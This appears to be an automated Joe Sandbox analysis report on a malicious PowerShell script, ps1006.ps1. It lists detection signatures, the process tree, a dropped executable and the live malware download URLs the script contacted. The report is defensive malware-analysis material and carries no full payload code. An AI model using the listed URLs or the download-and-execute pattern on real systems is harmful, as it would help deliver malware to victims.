Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ps1006.ps1

Overview

General Information

Sample name:ps1006.ps1
Analysis ID:1560748
MD5:c538cd6483e9cf1510943d965f890777
SHA1:4dd880286916a54f6b0b3ed74e85135d1b2fc032
SHA256:8d09f0aa9a5d675e1f28dd31f6c982d33924c58d7b9b873d5cc90f3ddea5b491
Tags:malwareps1user-Joker
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 4416 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 6240 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES53EF.tmp" "c:\Users\user\AppData\Local\Temp\3udn0yxz\CSCAE9011C6523D4F1EAAD46B3D766D9AF5.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7096JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 7096INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0xae94:$b2: ::FromBase64String(
    • 0xaf14:$b2: ::FromBase64String(
    • 0xb485:$b2: ::FromBase64String(
    • 0xcc8b18:$b2: ::FromBase64String(
    • 0xcc8b98:$b2: ::FromBase64String(
    • 0xcc9109:$b2: ::FromBase64String(
    • 0xd8c456:$b2: ::FromBase64String(
    • 0xd8c4d6:$b2: ::FromBase64String(
    • 0xd8ca47:$b2: ::FromBase64String(
    • 0xb3bd:$s1: -join
    • 0xd9a07:$s1: -join
    • 0xe6adc:$s1: -join
    • 0xe9eae:$s1: -join
    • 0xea560:$s1: -join
    • 0xec051:$s1: -join
    • 0xee257:$s1: -join
    • 0xeea7e:$s1: -join
    • 0xef2ee:$s1: -join
    • 0xefa29:$s1: -join
    • 0xefa5b:$s1: -join
    • 0xefaa3:$s1: -join

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
    Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7096, TargetFilename: C:\Users\Public\509.exe
    Sigma detected: Change PowerShell Policies to an Insecure Level
    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1", ProcessId: 7096, ProcessName: powershell.exe
    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7096, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline", ProcessId: 4416, ProcessName: csc.exe
    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7096, TargetFilename: C:\Users\Public\509.exe
    Sigma detected: Dynamic CSharp Compile Artefact
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7096, TargetFilename: C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1", ProcessId: 7096, ProcessName: powershell.exe

    Data Obfuscation

    barindex
    Sigma detected: Dot net compiler compiles file from suspicious location
    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7096, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline", ProcessId: 4416, ProcessName: csc.exe

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: ps1006.ps1Avira: detected
    Antivirus detection for URL or domain
    Source: http://fenett2018.comAvira URL Cloud: Label: malware
    Source: http://eastend.jpAvira URL Cloud: Label: malware
    Source: http://eastend.jp/bl5kfaAvira URL Cloud: Label: malware
    Source: http://yourmother4cancer.infoAvira URL Cloud: Label: malware
    Source: http://bemnyc.com/u8erijeqAvira URL Cloud: Label: malware
    Source: http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23Avira URL Cloud: Label: malware
    Source: http://fenett2018.com/dobgxAvira URL Cloud: Label: malware
    Source: http://abakus-biuro.net//a9zqemmAvira URL Cloud: Label: malware
    Multi AV Scanner detection for submitted file
    Source: ps1006.ps1ReversingLabs: Detection: 63%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
    Source: Binary string: @/"z.pdb source: powershell.exe, 00000000.00000002.2809800197.000001B2B46D0000.00000004.00000020.00020000.00000000.sdmp
    Source: global trafficHTTP traffic detected: GET /bl5kfa HTTP/1.1Host: eastend.jpConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /u8erijeq HTTP/1.1Host: bemnyc.comConnection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 198.185.159.145 198.185.159.145
    Source: Joe Sandbox ViewIP Address: 198.185.159.145 198.185.159.145
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /bl5kfa HTTP/1.1Host: eastend.jpConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /u8erijeq HTTP/1.1Host: bemnyc.comConnection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: habarimoto24.com
    Source: global trafficDNS traffic detected: DNS query: fenett2018.com
    Source: global trafficDNS traffic detected: DNS query: eastend.jp
    Source: global trafficDNS traffic detected: DNS query: bemnyc.com
    Source: global trafficDNS traffic detected: DNS query: abakus-biuro.net
    Source: global trafficDNS traffic detected: DNS query: yourmother4cancer.info
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 08:22:05 GMTContent-Type: text/htmlContent-Length: 2814Connection: keep-aliveVary: Accept-EncodingLast-Modified: Tue, 25 Jul 2023 10:28:06 GMTETag: "afe-6014d2fcf5ab8"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://abakus-biuro.net
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp, ps1006.ps1String found in binary or memory: http://abakus-biuro.net//a9zqemm
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bemnyc.com
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp, ps1006.ps1String found in binary or memory: http://bemnyc.com/u8erijeq
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://eastend.jp
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp, ps1006.ps1String found in binary or memory: http://eastend.jp/bl5kfa
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C5CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fenett2018.com
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp, ps1006.ps1String found in binary or memory: http://fenett2018.com/dobgx
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29DDFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://habarimoto24.com
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp, ps1006.ps1String found in binary or memory: http://habarimoto24.com/nh
    Source: powershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C1E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000000.00000002.2810364185.000001B2B49E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
    Source: powershell.exe, 00000000.00000002.2810364185.000001B2B49E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cy
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yourmother4cancer.info
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C1E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000000.00000002.2805114270.000001B2B4410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-202
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29D8EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2665414648.000001B29D8C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
    Source: powershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29DDFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2665414648.000001B29DC69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://status.squarespace.com

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B875F780_2_00007FFD9B875F78
    Source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: classification engineClassification label: mal96.expl.evad.winPS1@7/14@6/2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\509.exeJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2swlg4m.ubm.ps1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: ps1006.ps1ReversingLabs: Detection: 63%
    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1006.ps1"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline"
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES53EF.tmp" "c:\Users\user\AppData\Local\Temp\3udn0yxz\CSCAE9011C6523D4F1EAAD46B3D766D9AF5.TMP"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.cmdline"Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES53EF.tmp" "c:\Users\user\AppData\Local\Temp\3udn0yxz\CSCAE9011C6523D4F1EAAD46B3D766D9AF5.TMP"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
